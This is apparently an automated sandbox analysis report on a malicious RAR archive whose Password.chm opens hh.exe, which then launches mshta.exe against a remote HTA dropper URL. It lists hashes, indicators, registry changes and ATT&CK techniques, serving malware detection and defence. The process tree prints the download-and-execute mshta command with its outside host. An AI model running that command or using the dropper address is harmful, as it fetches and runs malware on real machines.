df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5

General

Target

df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5.rar
Size

20KB
MD5

e9230cf7615338ab037719646d67351b
SHA1

12103bc077f677afb2ba7fac6445df3dd2f6df00
SHA256

df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5
SHA512

ea105a506746142d84622e73af65992abb12b1c78810d8d9814f4e34434aa4886faf8bf52938bf307d04d235676e4751c8c2f635600e42d434f1f458d5e8188c
SSDEEP

384:eADnJetU1vItt31ye18De7iKncEHAUuOeja4zj6acJP7D8ynXITubFoxZ:eAj8O1vItZ1ye1T7ier/uOFc6FJPkGXW

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://141.105.65.165/data/11.html

Signatures

Blocklisted process makes network request 8 IoCs

flow	pid	Process
7	1432	mshta.exe
9	1080	mshta.exe
11	1548	mshta.exe
13	1780	mshta.exe
16	1432	mshta.exe
17	1548	mshta.exe
18	1080	mshta.exe
22	1780	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main	hh.exe
Key created	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_Classes\Local Settings	rundll32.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: 33	2008	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2008	AUDIODG.EXE
Token: 33	2008	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2008	AUDIODG.EXE
Token: SeRestorePrivilege	2032	7zG.exe
Token: 35	2032	7zG.exe
Token: SeSecurityPrivilege	2032	7zG.exe
Token: SeSecurityPrivilege	2032	7zG.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2032	7zG.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1084	hh.exe
1084	hh.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 960 wrote to memory of 588	960	cmd.exe	28
PID 960 wrote to memory of 588	960	cmd.exe	28
PID 960 wrote to memory of 588	960	cmd.exe	28
PID 1084 wrote to memory of 1432	1084	hh.exe	39
PID 1084 wrote to memory of 1432	1084	hh.exe	39
PID 1084 wrote to memory of 1432	1084	hh.exe	39
PID 1084 wrote to memory of 1080	1084	hh.exe	40
PID 1084 wrote to memory of 1080	1084	hh.exe	40
PID 1084 wrote to memory of 1080	1084	hh.exe	40
PID 1084 wrote to memory of 1548	1084	hh.exe	41
PID 1084 wrote to memory of 1548	1084	hh.exe	41
PID 1084 wrote to memory of 1548	1084	hh.exe	41
PID 1084 wrote to memory of 1780	1084	hh.exe	42
PID 1084 wrote to memory of 1780	1084	hh.exe	42
PID 1084 wrote to memory of 1780	1084	hh.exe	42

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5.rar
1⤵
- Suspicious use of WriteProcessMemory
PID:960
- C:\Windows\system32\rundll32.exe
  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5.rar
  2⤵
  - Modifies registry class
  PID:588

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1380

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x1ac
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5\" -ad -an -ai#7zMap24034:186:7zEvent1300
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2032

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\Desktop\df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5\Password.chm
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1084
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" http://141.105.65.165/data/11.html ,
  2⤵
  - Blocklisted process makes network request
  - Modifies Internet Explorer settings
  PID:1432
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" http://141.105.65.165/data/11.html ,
  2⤵
  - Blocklisted process makes network request
  - Modifies Internet Explorer settings
  PID:1080
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" http://141.105.65.165/data/11.html ,
  2⤵
  - Blocklisted process makes network request
  - Modifies Internet Explorer settings
  PID:1548
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" http://141.105.65.165/data/11.html ,
  2⤵
  - Blocklisted process makes network request
  - Modifies Internet Explorer settings
  PID:1780

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5\Password.chm

Filesize
10KB

MD5
b39182a535f41699280ca088eef0f258

SHA1
e1d570867afe13dcd4a9193a23c1deee384eb342

SHA256
ff0d4259510d8b9d6e43cec5224d72570f3b4e17ebd7f0c1ad1922748dec15e6

SHA512
b084b53dd6f25ae066b60b4e4a8037d7e9eeea7fa02acf4518289b98f106a7872fae1d5d731ada5ecbb7589f6dc221cf162143702f0650caad098eab6ddfbd91

Download Submit

Analysis

Sharing